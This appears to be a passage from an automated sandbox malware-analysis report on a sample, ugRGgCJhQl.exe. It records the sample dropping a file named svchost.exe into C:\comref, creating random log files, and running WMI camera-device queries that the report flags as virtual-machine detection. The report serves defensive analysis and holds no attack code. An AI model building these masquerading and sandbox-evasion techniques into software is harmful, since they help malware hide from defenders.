Source:	Binary string: C:/Users/user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: svchost.exe, 0000000E.00000002.3698250628.000000000628D000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:/Users/user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: svchost.exe, 0000000E.00000002.3698250628.0000000005E7E000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:/Users/user\AppData\Local\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: svchost.exe, 0000000E.00000002.3698250628.00000000052B6000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:/Users/user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: svchost.exe, 0000000E.00000002.3698250628.0000000006665000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:/Users/user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: svchost.exe, 0000000E.00000002.3698250628.00000000056AF000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:/Users/user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: svchost.exe, 0000000E.00000002.3698250628.00000000044FA000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:/Users/user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: svchost.exe, 0000000E.00000002.3698250628.000000000539C000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:/Users/user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: svchost.exe, 0000000E.00000002.3698250628.0000000006A94000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:/Users/user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: svchost.exe, 0000000E.00000002.3698250628.0000000006665000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:/Users/user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: svchost.exe, 0000000E.00000002.3698250628.0000000005AAB000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:/Users/user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: svchost.exe, 0000000E.00000002.3698250628.00000000056AF000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:/Users/user\AppData\Local\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: svchost.exe, 0000000E.00000002.3698250628.000000000628D000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:/Users/user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: svchost.exe, 0000000E.00000002.3698250628.0000000006628000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:/Users/user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: svchost.exe, 0000000E.00000002.3698250628.0000000006665000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:/Users/user\Local Settings\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: svchost.exe, 0000000E.00000002.3698250628.0000000004A9C000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:/Users/user\AppData\Local\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: svchost.exe, 0000000E.00000002.3698250628.000000000628D000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:/Users/user\Local Settings\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: svchost.exe, 0000000E.00000002.3698250628.0000000004A9C000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:/Users/user\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: svchost.exe, 0000000E.00000002.3698250628.0000000005AAB000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: ugRGgCJhQl.exe
Source:	Binary string: C:/Users/user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: svchost.exe, 0000000E.00000002.3698250628.0000000006876000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:/Users/user\Local Settings\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: svchost.exe, 0000000E.00000002.3698250628.0000000004BFC000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:/Users/user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: svchost.exe, 0000000E.00000002.3698250628.0000000005AAB000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: zC:/Users/user\AppData\Local\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: svchost.exe, 0000000E.00000002.3698250628.00000000052B6000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:/Users/user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: svchost.exe, 0000000E.00000002.3698250628.00000000056AF000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: {C:/Users/user\Local Settings\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: svchost.exe, 0000000E.00000002.3698250628.0000000004BFC000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:/Users/user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: svchost.exe, 0000000E.00000002.3698250628.0000000006665000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: kC:/Users/user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: svchost.exe, 0000000E.00000002.3698250628.0000000004CB9000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:/Users/user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: svchost.exe, 0000000E.00000002.3698250628.0000000006665000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:/Users/user\AppData\Local\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: svchost.exe, 0000000E.00000002.3698250628.0000000006455000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:/Users/user\Local Settings\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: svchost.exe, 0000000E.00000002.3698250628.0000000004A9C000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:/Users/user\AppData\Local\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: svchost.exe, 0000000E.00000002.3698250628.0000000006455000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: lC:/Users/user\Local Settings\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: svchost.exe, 0000000E.00000002.3698250628.0000000004877000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:/Users/user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: svchost.exe, 0000000E.00000002.3698250628.0000000005E7E000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:/Users/user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: svchost.exe, 0000000E.00000002.3698250628.00000000056AF000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: \|C:/Users/user\AppData\Local\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: svchost.exe, 0000000E.00000002.3698250628.00000000052B6000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:/Users/user\AppData\Local\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: svchost.exe, 0000000E.00000002.3698250628.000000000628D000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:/Users/user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: svchost.exe, 0000000E.00000002.3698250628.0000000006876000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:/Users/user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: svchost.exe, 0000000E.00000002.3698250628.00000000044FA000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:/Users/user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: svchost.exe, 0000000E.00000002.3698250628.0000000006628000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:/Users/user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: svchost.exe, 0000000E.00000002.3698250628.000000000539C000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:/Users/user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: svchost.exe, 0000000E.00000002.3698250628.000000000539C000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:/Users/user\Local Settings\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: svchost.exe, 0000000E.00000002.3698250628.0000000004A9C000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:/Users/user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: svchost.exe, 0000000E.00000002.3698250628.00000000044FA000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:/Users/user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: svchost.exe, 0000000E.00000002.3698250628.0000000006665000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:/Users/user\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: svchost.exe, 0000000E.00000002.3698250628.0000000005AAB000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:/Users/user\Local Settings\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: svchost.exe, 0000000E.00000002.3698250628.0000000004BFC000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:/Users/user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: svchost.exe, 0000000E.00000002.3698250628.000000000628D000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:/Users/user\AppData\Local\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: svchost.exe, 0000000E.00000002.3698250628.0000000006455000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: jC:/Users/user\Local Settings\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: svchost.exe, 0000000E.00000002.3698250628.0000000004877000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:/Users/user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: svchost.exe, 0000000E.00000002.3698250628.00000000056AF000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:/Users/user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: svchost.exe, 0000000E.00000002.3698250628.0000000006628000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: oC:/Users/user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: svchost.exe, 0000000E.00000002.3698250628.0000000004CB9000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:/Users/user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: svchost.exe, 0000000E.00000002.3698250628.0000000006876000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:/Users/user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: svchost.exe, 0000000E.00000002.3698250628.0000000006A94000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:/Users/user\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: svchost.exe, 0000000E.00000002.3698250628.0000000005AAB000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:/Users/user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: svchost.exe, 0000000E.00000002.3698250628.0000000006665000.00000004.00000800.00020000.00000000.sdmp

Source: ugRGgCJhQl.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: ugRGgCJhQl.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: ugRGgCJhQl.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: ugRGgCJhQl.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: ugRGgCJhQl.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Source: C:\Users\user\Desktop\ugRGgCJhQl.exe

File created: C:\comref\__tmp_rar_sfx_access_check_4774343

Jump to behavior

Source: ugRGgCJhQl.exe

Static PE information: section name: .didat

Source: C:\Users\user\Desktop\ugRGgCJhQl.exe	Code function: 0_2_002FF640 push ecx; ret	0_2_002FF653
Source: C:\Users\user\Desktop\ugRGgCJhQl.exe	Code function: 0_2_002FEB78 push eax; ret	0_2_002FEB96
Source: C:\comref\svchost.exe	Code function: 14_2_00007FFAAB785427 push ebx; ret	14_2_00007FFAAB785434
Source: C:\comref\svchost.exe	Code function: 14_2_00007FFAAB94767C push ds; ret	14_2_00007FFAAB94769A
Source: C:\comref\svchost.exe	Code function: 14_2_00007FFAAB947E28 push ebx; ret	14_2_00007FFAAB947E3A

Source: svchost.exe.0.dr

Static PE information: section name: .text entropy: 7.557579213001608

Persistence and Installation Behavior

Drops PE files with benign system names

Source: C:\Users\user\Desktop\ugRGgCJhQl.exe

File created: C:\comref\svchost.exe

Jump to dropped file

Source: C:\comref\svchost.exe	File created: C:\Users\user\Desktop\LMrHnriI.log	Jump to dropped file
Source: C:\Users\user\Desktop\ugRGgCJhQl.exe	File created: C:\comref\svchost.exe	Jump to dropped file
Source: C:\comref\svchost.exe	File created: C:\Users\user\Desktop\ThQetCXk.log	Jump to dropped file
Source: C:\comref\svchost.exe	File created: C:\Users\user\Desktop\ApTjSBhc.log	Jump to dropped file
Source: C:\comref\svchost.exe	File created: C:\Users\user\Desktop\eVuUdNSS.log	Jump to dropped file
Source: C:\comref\svchost.exe	File created: C:\Users\user\Desktop\jIMTFKhG.log	Jump to dropped file

Source: C:\comref\svchost.exe	File created: C:\Users\user\Desktop\LMrHnriI.log	Jump to dropped file
Source: C:\comref\svchost.exe	File created: C:\Users\user\Desktop\eVuUdNSS.log	Jump to dropped file
Source: C:\comref\svchost.exe	File created: C:\Users\user\Desktop\ThQetCXk.log	Jump to dropped file
Source: C:\comref\svchost.exe	File created: C:\Users\user\Desktop\jIMTFKhG.log	Jump to dropped file
Source: C:\comref\svchost.exe	File created: C:\Users\user\Desktop\ApTjSBhc.log	Jump to dropped file

Source: C:\Users\user\Desktop\ugRGgCJhQl.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\comref\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\comref\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\comref\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\comref\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\comref\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\comref\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\comref\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\comref\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\comref\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\comref\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\comref\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\comref\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\comref\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\comref\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\comref\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\comref\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\comref\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\comref\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\comref\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\comref\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\comref\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\comref\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\comref\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\comref\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\comref\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\comref\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\comref\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\comref\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\comref\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\comref\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\comref\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\comref\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\comref\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\comref\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\comref\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\comref\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\comref\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\comref\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\comref\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\comref\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\comref\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\comref\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\comref\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\comref\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\comref\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\comref\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\comref\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\comref\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\comref\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\comref\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\comref\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\comref\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\comref\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\comref\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\comref\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\comref\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\comref\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\comref\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\comref\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\comref\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\comref\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\comref\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\comref\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\comref\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\comref\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\comref\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\comref\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\comref\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\comref\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\comref\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\comref\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\comref\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\comref\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\comref\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\comref\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\comref\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\comref\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\comref\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\comref\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\comref\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\comref\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\comref\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\comref\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\comref\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\comref\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)

Source: C:\comref\svchost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\comref\svchost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\comref\svchost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\comref\svchost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\comref\svchost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\comref\svchost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\comref\svchost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\comref\svchost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\comref\svchost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\comref\svchost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\comref\svchost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\comref\svchost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\comref\svchost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
